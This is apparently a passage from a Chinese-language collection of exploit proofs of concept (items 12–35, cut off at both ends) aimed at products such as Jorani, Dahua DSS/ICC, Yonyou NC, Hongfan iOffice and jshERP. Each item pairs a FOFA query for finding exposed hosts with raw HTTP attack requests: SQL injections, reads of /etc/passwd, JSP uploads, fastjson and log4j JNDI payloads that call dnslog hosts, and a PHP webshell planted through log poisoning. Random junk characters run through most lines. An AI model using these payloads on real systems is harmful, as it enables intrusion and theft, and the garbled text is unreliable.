GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.17 m( v, f% @- F' x' i: V
Host: 127.0.0.1& D( i ]8 j3 Z2 G8 O& B2 g0 g
Pragma: no-cache
; K. g3 ?+ j {/ p. @/ BCache-Control: no-cache
6 r. R# N7 Y- q/ T- v. CUpgrade-Insecure-Requests: 1$ z1 D! `# S A$ J2 n0 g4 S8 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* _2 X; e2 ^; |" `$ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% n" ~# k/ m: P2 f- v) |. q, I3 p
Accept-Encoding: gzip, deflate1 K2 N' j3 m! l7 _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 {9 w1 c6 u$ x: r% _4 d
Connection: close P! D5 v# R, N) R
/ R* {3 O0 O. w: I1 c
D9 L. H" I1 l$ i
12. Jorani < 1.0.2 远程命令执行
: m4 p( K1 _, H# D" q! L9 KFOFA:title="Jorani"
+ j, y o8 M9 @% V( s第一步先拿到cookie
8 s9 x2 V0 G% ^* }% xGET /session/login HTTP/1.1, K2 L( V# X# q( T, G
Host: 192.168.190.30( j6 M7 ?0 V" W' u% `8 H
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36* M; F5 ]& Q. u. Q
Connection: close0 |; k* m+ P, A- E& g# B( D9 J, k
Accept-Encoding: gzip* v( a2 O! i6 V) I
% h9 L, z# k% d$ o8 |; h, _# `
' n- X- u3 k3 V2 |0 N/ a/ r7 r响应中csrf_cookie_jorani用于后续请求9 Q h+ k/ s& L* C# [
HTTP/1.1 200 OK8 o, |5 V. t a6 @% l+ I* y+ e
Connection: close. L; U- P5 [/ P; x! c5 L @' ?: {
Cache-Control: no-store, no-cache, must-revalidate
5 s( u* {; ?$ c: iContent-Type: text/html; charset=UTF-85 T6 {6 s( K4 H. K& m: q
Date: Tue, 24 Oct 2023 09:34:28 GMT, W5 N3 C' [9 p$ v: I
Expires: Thu, 19 Nov 1981 08:52:00 GMT
' y5 P" `' f# @/ ELast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
( Q1 n0 Z8 \ d( S. {0 P' v G, I5 QPragma: no-cache+ x% @" l: [' ]- o; f
Server: Apache/2.4.54 (Debian)
$ i4 [: r# T5 O6 _8 y4 g2 n" CSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
8 s3 y4 \( \* H7 [Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
! E1 K+ |' {+ t, pVary: Accept-Encoding
+ ?' u/ M) `% y9 n
0 m/ \/ ^- v+ F3 e1 ~2 s
# @- i$ ~. j& t+ J8 d0 _! d% O! KPOST请求,执行函数并进行base64编码
) S) c3 @. q* F: U% p' uPOST /session/login HTTP/1.1
# w6 s8 b. n% N) _( X, vHost: 192.168.190.30
( a9 W: B1 J6 Z* L4 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.368 v( m6 A n9 ~9 c/ B5 K
Connection: close7 J `1 @4 Y/ Z4 s3 D
Content-Length: 252+ A. ]- {, P8 G0 p5 v7 Z
Content-Type: application/x-www-form-urlencoded2 R9 h z; S+ ^5 |/ @& Y: F
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
: m- X; c `8 ?+ ]# Z3 yAccept-Encoding: gzip
) K& z# T, g7 i. Z7 d# [
" Y: F0 `6 O: g2 B/ _: Zcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor! z; P O6 y' Y9 z: V: e+ {; a
1 R' u9 s8 z9 K9 v) b u) l
, A* j7 q% m( J$ l0 x. f7 g% g7 t) f# B9 B6 ], y
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
. P$ L' A' A3 q, cGET /pages/view/log-2023-10-24 HTTP/1.1 X' F+ j# K) R# f0 h& w
Host: 192.168.190.30
6 k, a- X0 J% Q w5 f1 L( GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 y& w c7 R& J0 z# e( yConnection: close
2 E- H1 q& {3 ^1 r PCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 m- X c* g; h6 S* f/ I
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=5 y. [+ }; Q! D" N- c
X-REQUESTED-WITH: XMLHttpRequest/ r0 F7 D& h& l
Accept-Encoding: gzip/ @9 O7 u h% {8 C5 |, \
. x7 L, \' K4 \! C) g
) ?# l+ T! m7 g: ?0 x: s
13. 红帆iOffice ioFileDown任意文件读取 F# S" z6 K6 N% h; E
FOFA:app="红帆-ioffice"
# j, A* F) o5 A9 ]/ u' R* L' M& KGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
9 }. F. i: M. }+ D$ oHost: x.x.x.x+ F" q1 G6 o |3 f7 Q( v8 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 v- S: g8 v+ |3 A! z4 |; f+ K
Connection: close
) U) R: X& d6 |( h# X' X7 B* bAccept: */*
2 _: m# Z, b }: b. R. z8 V4 b2 mAccept-Encoding: gzip
1 d! R: i5 @! t' g* L5 b/ v0 N8 r( I" V) i. T
2 b v: q( y4 p/ o3 Q; [1 i
14. 华夏ERP(jshERP)敏感信息泄露8 N; I/ s: t0 I! Y' Q* `
FOFA:body="jshERP-boot", [& q( d- H& H5 W% V- S
泄露内容包括用户名密码$ z- L% Z* _$ I& G# g# c ]5 r
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1/ H4 h8 z7 {: W; g; |
Host: x.x.x.x p# u" v* F& Z" R8 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ | i. H7 `) L1 _3 QConnection: close" ^- O' |( X/ [1 R* z o
Accept: */*0 [1 W$ u& U3 P
Accept-Language: en; b7 E9 q6 i1 ?- H
Accept-Encoding: gzip
) q U. d. C+ u( a: n# l" {5 x5 K5 j* Z5 d. \: b
; e. \4 d" i5 x# {/ T* N* g7 P
15. 华夏ERP getAllList信息泄露
- d _1 q& Q% OCVE-2024-0490
3 ~# i/ i. g, p- E1 nFOFA:body="jshERP-boot"
( g" \% @+ ?# V5 t% E" @: t9 p泄露内容包括用户名密码
1 P9 \2 d" b" Z* x& ]! KGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1 e3 l* ~1 k* l2 Q
Host: 192.168.40.130:100
! ]% @6 W" w2 o' I m% TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
; O6 i' d$ S' I6 e% qConnection: close
, g: |3 n; `% OAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
2 E% b" J, o [) xAccept-Language: en
3 s4 R/ F$ B8 ^sec-ch-ua-platform: Windows
+ P5 c8 A3 _ v1 P* m: D1 R2 NAccept-Encoding: gzip
r$ J1 b0 l7 L* R$ |4 K7 a! G N
8 B2 S3 b7 C0 ?0 n6 f16. 红帆HFOffice医微云SQL注入
" b( m7 p* n# \/ I4 R. U/ OFOFA:title="HFOffice". O4 V$ \9 N" D& C# @
poc中调用函数计算1234的md5值2 S. V1 r7 e+ D! d/ i9 N
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
6 T9 E3 X7 m6 H2 y2 m# Z- | [Host: x.x.x.x
v( X1 A/ w! M' E4 H* BUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, G$ ?% B9 |. [ c+ @3 b
Connection: close
7 s0 A% q8 \( T: f- W) sAccept: */*6 {9 U1 a) W- x% S
Accept-Language: en
" d! ^6 F4 g$ X( BAccept-Encoding: gzip
$ `1 V, r+ p; c' @% }' p1 f; d
+ q) t3 C5 i: i4 ~
9 ~' T" P3 ~9 B# O. T0 {) k17. 大华 DSS itcBulletin SQL 注入
- a- X1 O' o) b) D4 UFOFA:app="dahua-DSS"
) A6 J+ h& I' k+ f- u& MPOST /portal/services/itcBulletin?wsdl HTTP/1.1- i& i+ I9 i( q
Host: x.x.x.x
( D1 ~/ Q$ Z1 e3 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' h) ]: ]+ K2 _& q# ~ q6 \9 v
Connection: close+ x0 n0 s5 I/ u( x6 R9 @
Content-Length: 345; s* e, ~4 A, y$ o3 I Z
Accept-Encoding: gzip. J" m; d+ o( l1 e
' e/ d: N) u! Z$ n" g* n& R, o<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
! U, A& s* ?& v4 Q( T+ q<s11:Body>; v9 n: F) a9 t7 ]
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>* ]1 x$ O7 c! h0 r- {
<netMarkings>$ h. B+ k; i# x u0 Y
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=12 b1 `4 ^ m% M1 w6 a
</netMarkings>
- _" T/ W9 m# }) O, f </ns1:deleteBulletin>
" g' {% q$ V A' o u% j# T7 @6 E </s11:Body>$ J5 R3 _& i( v9 q5 P
</s11:Envelope>
' V/ C' i' n# q4 v) }) e1 S, ^0 a
: P0 ?7 P7 k* x4 I2 x3 K6 Z# `9 E
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% \2 M/ ^5 q7 H& G8 VFOFA:app="dahua-DSS"
2 N# v: k: t# E2 C x* q' ]% Y: W$ LGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
9 W5 z. J6 T4 J7 [Host: your-ip+ N3 C- J4 r2 F% O' i" S' N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; A1 C) T4 p. C0 \Accept-Encoding: gzip, deflate7 O/ W7 u# z4 T! z. z7 F: P
Accept: */*2 ?( @ y( Y# o4 I- |$ {' k
Connection: keep-alive7 C, n# p, j: R4 p
9 c3 M! g* D2 r5 ]
' V3 E l2 h1 ]. x
7 a! P9 G: j& N! P, x7 U4 i19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
- e' P1 a: W. x! S1 i2 D2 ^9 ?FOFA:app="dahua-DSS"1 `; u2 z B; u0 O# Y4 ?
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
0 T; i1 A8 d! x7 O/ M0 \Host:" |8 ]( ~1 T% G- ?3 {9 o: v: m
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ g6 ]4 D6 m6 T( h! a+ uAccept-Encoding: gzip, deflate
* r& L) o' e- D) M! RAccept: */*
& x0 N) G) e& I. T8 V8 SConnection: keep-alive
# n. N$ [' p# `, B( `' k. `
. _: p$ D! g" U" u, j( G/ _5 B) E: L2 E; ?* b6 Y
20. 大华ICC智能物联综合管理平台任意文件读取. D: q" ^& y+ C6 O4 P" F3 n
FOFA:body="*客户端会小于800*"4 U4 G. P; s+ l& \7 a
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1- B- o7 J- n" I" x5 O6 Z6 e
Host: x.x.x.x7 @, m+ s# D/ [ S
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. J6 e/ h1 _; g: T$ ?0 f. k$ KConnection: close n6 i1 u, t* _: E
Accept: */*
0 i& B* r+ \. m, m' u# RAccept-Language: en" C8 P! G. a M+ |! H1 ^& m# q: e
Accept-Encoding: gzip1 ?4 ]9 P7 [) v" v( p+ f/ N* M; c
! a- C) s: H- F$ y$ ]4 P
6 F5 I) r0 `8 V$ z, s! _21. 大华ICC智能物联综合管理平台random远程代码执行
; l3 s& l4 o+ r1 c. {FOFA:icon_hash="-1935899595"/ z" m# I i. M- I* l
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
/ [: e# }5 T3 q% h$ j6 u8 fHost: x.x.x.x
1 |0 c4 T# Z+ H6 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! t: t! z- e$ E* K* a2 v6 Y6 J& s& SContent-Length: 161
5 w/ n+ u% ^' e8 `5 r$ TAccept-Encoding: gzip* A2 {" l2 O3 f# d
Connection: close
5 y4 P" B3 v: A# M2 O" FContent-Type: application/json;charset=utf-81 x" @8 k7 x1 M5 F' y1 _
5 o! S1 A3 o7 s6 g8 l- I8 J
{
) p. {! P7 e' B, M* V"a":{
+ Z* c) D) u* w: s" Z# E/ ] "@type":"com.alibaba.fastjson.JSONObject",3 X0 @2 F# u# `) M: `& d1 ?& H
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}$ _; A" X8 ?5 O; F2 B4 C+ R
}""
! G) J$ R7 Z# |8 v+ }" L5 T}& E9 G3 ?& x4 d0 _3 R
7 l4 `! G. I1 B
% i) i6 G' B! _( G( r
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" G* B6 H! k3 y/ }9 z7 k% \FOFA:icon_hash="-1935899595"1 h6 Z9 P c( p) Y2 G( i$ F1 a
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1 e* ]# Q$ D/ O/ w8 ?8 R& N; @
Host: your-ip* A) b$ r, ]- @/ u$ I, n# K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 P4 Z' K! z9 w! S" F7 t4 l
Content-Type: application/json;charset=utf-8
; B$ W* o9 |, }4 y3 P& R. h5 U
{
) K& O8 j& Q& q7 I+ {; f- z$ ~"loginName":"${jndi:ldap://dnslog}"# U2 }- q& r- d1 t1 G
}
* i1 V# Y' W# R1 J6 A# G% K5 F& b. L' C& g8 X) \( y" e
4 q/ ?# c" r0 q
% y a- b! Y* e6 p( k5 ^) Y4 i23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
?! ~% q; l7 p. S4 \, | ]# E$ MFOFA:icon_hash="-1935899595", M5 D# U1 x/ j) D: {/ y) F$ u8 P4 L
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
) A7 `" U+ H: x/ WHost: your-ip
; z6 W) N+ L! F- bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ O, x) u4 [* C# e; ]3 k0 u( `4 VContent-Type: application/json;charset=utf-8+ i- \7 g% t( C5 ~! G6 T) M
Accept-Encoding: gzip
2 X! u# [' X+ ^) E2 z: AConnection: close
5 p, W8 X( `8 q" N
7 u- ^% `+ }3 R3 W- Q3 J G& } M9 E{
r6 M# w* [, z1 Y "a":{0 H' D7 ^6 M9 j) X4 }/ p
"@type":"com.alibaba.fastjson.JSONObject",/ ~ p7 J$ K, `# H& v0 o+ C, ?
{"@type":"java.net.URL","val":"http://DNSLOG"}: K, c3 K: I9 D1 g1 g
}"". R1 e& e* I" e. H
}
1 t/ l% w" r4 y+ E& E* i
1 {' s- Q( J9 W+ t# y; n& i! N5 M( y6 p8 I, s* m! Q4 d
24. 用友NC 6.5 accept.jsp任意文件上传
/ U$ m3 A: Y$ B! N/ [) b% a1 S( UFOFA:icon_hash="1085941792"
: [, K- p' ]; w i3 B% F" \6 hPOST /aim/equipmap/accept.jsp HTTP/1.1
$ V+ O2 S5 j) _: w4 a6 BHost: x.x.x.x1 U$ I. Z! ~2 s' F" \" m
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36$ ?' t" Y" t. t) a% t& e, ?$ }
Connection: close
& o: I) @) ?( CContent-Length: 449+ L) F. w* K. H+ d' H2 j' m
Accept: */*, l: a/ I) b: F& A' J7 h$ H
Accept-Encoding: gzip/ I Y4 p) `% h+ N8 W
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
4 ~$ j$ t- Z x* W H9 o C# t9 g4 [' b; |6 ^6 A {4 a! Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: i+ s5 s" B! L6 Y, G; X
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"/ C7 j! R* J3 D' V8 Z8 `& n
Content-Type: text/plain: K: k1 L. e6 ~$ k
6 s# g+ i. ?! ^. v& {<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
* F1 S/ \6 r1 z' ~& z. Q: W-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
4 u3 o" t9 w7 n- @7 V9 i/ _8 p! XContent-Disposition: form-data; name="fname"3 M+ a4 f. `6 w4 G% }- U
# ?/ `, }! R) j3 J\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
. g: b% U3 c- J/ l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--# {# s1 J& ?3 X; T
1 |9 \) n: X$ o" T* `2 [+ A& e" l% H" z, e: O- X1 @1 x, j9 c
25. 用友NC registerServlet JNDI 远程代码执行! @* c3 D& {; o) d% r g9 b6 J' l) @& j5 u
FOFA:app="用友-UFIDA-NC"+ i, h' q1 t; t6 O0 T7 U p
POST /portal/registerServlet HTTP/1.17 B! i& R* q) p) t+ o
Host: your-ip
9 `6 C! O+ Y% rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+ z& ~2 i8 c+ RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 Z U: k, m, G R- S4 uAccept-Encoding: gzip, deflate+ }* I) S, z) ?8 Y
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6& A% _" o* I% e6 Q
Content-Type: application/x-www-form-urlencoded8 ]- t* r5 V! u- X& O/ X
; [3 z6 _% P {3 E4 D0 ?+ ?* H, V
type=1&dsname=ldap://dnslog4 C% A3 p2 S& G) L) G! }+ k: E
# K9 D/ a' V; C5 I3 P# Z1 G
6 V7 ]+ r: ?4 D5 G5 U* R- n' `+ L, i; r$ L
26. 用友NC linkVoucher SQL注入
' W- [+ C8 p" ?6 \. CFOFA:app="用友-UFIDA-NC"
* S* E( z7 H! t3 ^GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.17 M1 b1 o% y) R. O! G& `- b
Host: your-ip6 }) C& M% [5 c- k/ N! L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) ~9 w- c% C \2 hContent-Type: application/x-www-form-urlencoded
- C- d C& q/ ]" W; FAccept-Encoding: gzip, deflate
$ |0 g0 ~* d, n) \2 wAccept: */*2 Y) a' ?0 N+ V( v* P
Connection: keep-alive
: M! h7 z" V0 C/ p$ D T5 `& |
- J7 M- R. f2 \7 w* H y9 I; y, _- x2 T5 f/ t E
27. 用友 NC showcontent SQL注入
' R6 J2 [, T' sFOFA:icon_hash="1085941792"
# d7 m) b$ |7 h7 h3 uGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1# h7 o$ `% I/ k4 [4 F
Host: your-ip
; {4 C4 V/ J$ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! y [% n& x5 B1 j% h; r; N$ Y' qAccept-Encoding: identity, p) M9 A: \7 f9 X6 @& ^9 E1 [
Connection: close
2 ], W2 s0 k% a0 X) M8 h& WContent-Type: text/xml; charset=utf-8
9 U3 ?) Z! ?/ G6 C4 p
1 q# b1 E3 b& O* ` A7 c. L! {. K
' u9 G2 J& R K0 u4 T; T28. 用友NC grouptemplet 任意文件上传
: B+ c; f+ g# U2 KFOFA:icon_hash="1085941792"$ b7 I, r) e! C! D
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
" }, j9 l2 J3 cHost: x.x.x.x
3 @8 ^' c3 n1 h1 U& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
5 h) H: \# l+ b* [& H! {- `( \Connection: close
: q! R* a; `% a) H5 O8 {; f' b# c$ J# cContent-Length: 268, x! K$ S7 p. I, h7 y& L7 l
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk! I$ |- D, h+ b; y
Accept-Encoding: gzip, {& I3 A& T' f+ f2 e
& r/ y: C" @- `- B------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* a. z6 q5 a3 i9 P$ zContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
( J8 K6 K4 j5 ?Content-Type: application/octet-stream
" k ?% m1 p9 ~9 X5 f D, k9 B/ a: M
" ]9 L2 E9 v; Y* D4 N<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
6 i7 z f# k8 n+ ~( k------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
( o" y* G6 [3 p; r7 I8 c& W
4 O- n4 Z7 K( j8 ?& ?" z2 S2 t8 E) U$ t3 u
/uapim/static/pages/nc/head.jsp
; p( x* V; c$ y6 u: i ^0 K& u
# O5 U5 E P' m29. 用友NC down/bill SQL注入
0 l# z$ x+ l, F- s, G, `. [- Z6 VFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, B- E# r3 k5 A" U( a; LGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 i; i2 p. n- C' a! z7 b2 CHost: your-ip
: `8 O4 [. d, r0 a$ Z$ ?1 e M2 H' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. n# i5 z M) U' A; h3 qContent-Type: application/x-www-form-urlencoded/ c: G! s" U( m1 F9 e$ F: r @
Accept-Encoding: gzip, deflate# K: X; C/ H! o
Accept: */*1 l' q$ f/ d2 t$ L" \
Connection: keep-alive( B8 p5 V/ T; b% d1 o, x0 Z
9 Y9 H' D) }# Q. G, [# t' f' p' P% e6 _" `
30. 用友NC importPml SQL注入
% L5 V0 ]) ?6 o; TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% c' `- f9 y; x& q* l. x
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
3 ?! k; \( T; iHost: your-ip7 n: i" k# u7 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
% p2 ?$ r4 \$ r( YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 l/ X. a U* r4 z% I
Connection: close! g4 i6 x; Y1 R
( ~ ]3 ~& s( w8 a( P+ R: k
------WebKitFormBoundaryH970hbttBhoCyj9V* I2 G8 r4 _( N. f- M
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"# ~+ f8 y+ l) C I7 i
Content-Type: image/jpeg
! |; h. P' }" F------WebKitFormBoundaryH970hbttBhoCyj9V--# `6 J1 ?" _% o+ e3 d' \1 X
/ W G+ a! b; I0 x
, g F8 {2 O. l0 v) B31. 用友NC runStateServlet SQL注入/ i" P6 b5 H6 ~3 p
version<=6.5
/ C7 Q4 u) `- V6 i7 S4 b. eFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' a# l9 T' L2 A- b* l! RGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.17 w2 S7 c% T( e) D
Host: host
# u' V2 H ^% W8 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; v1 f# G: n! G
Content-Type: application/x-www-form-urlencoded
# q* j4 c' b4 x4 }2 a
1 v" P: w) W0 n
% u9 W/ E5 B% Z% Y9 C! M6 l2 B32. 用友NC complainbilldetail SQL注入- j0 m9 c' V" u6 |0 o: b
version= NC633、NC65
# O: ?. j2 ^# R3 o+ z8 V5 B0 o3 lFOFA:app="用友-UFIDA-NC"0 b. G8 F' E ^; |
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 d, s Q& ]! l+ j( S, u; FHost: your-ip
; P6 }" Y% P" X; b5 d7 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& u- m0 Q' j+ J3 x/ b
Content-Type: application/x-www-form-urlencoded
. U' l9 t7 n* _Accept-Encoding: gzip, deflate6 C4 S; C7 r7 E) @
Accept: */*! Z4 O. x+ u8 U" U
Connection: keep-alive
4 G+ ^ a& I9 \, G% y9 I+ ~ g X# O% W U( z
" y( F1 ?( W8 ]" }6 a' C/ G2 ^. w
33. 用友NC downTax/download SQL注入
- r+ L4 d4 @5 e8 J" P& y" H+ @version:NC6.5FOFA:app="用友-UFIDA-NC"
0 \2 \. T; E$ V7 G/ U3 d2 @GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" d( d7 a, u* m9 gHost: your-ip; S1 n: z y9 ?2 C) T# M; q) T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" K9 ~7 @5 M# P B. Q- V! ?) M
Content-Type: application/x-www-form-urlencoded. c0 l; P/ n2 T$ [) I5 u$ Y; N
Accept-Encoding: gzip, deflate
. {5 M; b4 M7 ~* a, DAccept: */*( `2 H5 I- S/ ^! ]6 W0 @) G
Connection: keep-alive
7 O; P5 S( p, i _
& r. s) T" x$ Q g* c
% V L& X, X4 K34. 用友NC warningDetailInfo接口SQL注入* E$ V1 h) i4 M
FOFA:app="用友-UFIDA-NC"
& K' z( _8 t: y) u+ ^GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 R2 w9 }# C/ N1 ^0 @Host: your-ip% a1 s8 f( m, S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 O3 { n3 N+ D
Content-Type: application/x-www-form-urlencoded
7 I! n: Q* @; k3 g/ uAccept-Encoding: gzip, deflate7 R6 A B/ e) w6 b( M( f# O) J% q( {8 C' c
Accept: */*
/ w3 _7 ]9 f7 @: W4 ~( X1 tConnection: keep-alive
% t( d; ~3 [* J) C+ w8 R; D' M8 k9 z8 {
6 ?' n+ }+ o( N3 [0 p8 v+ g
35. 用友NC-Cloud importhttpscer任意文件上传
" s7 z6 P2 w; J s- C2 pFOFA:app="用友-NC-Cloud"
% z. N! R2 o" s. Q: `: l( X+ kPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
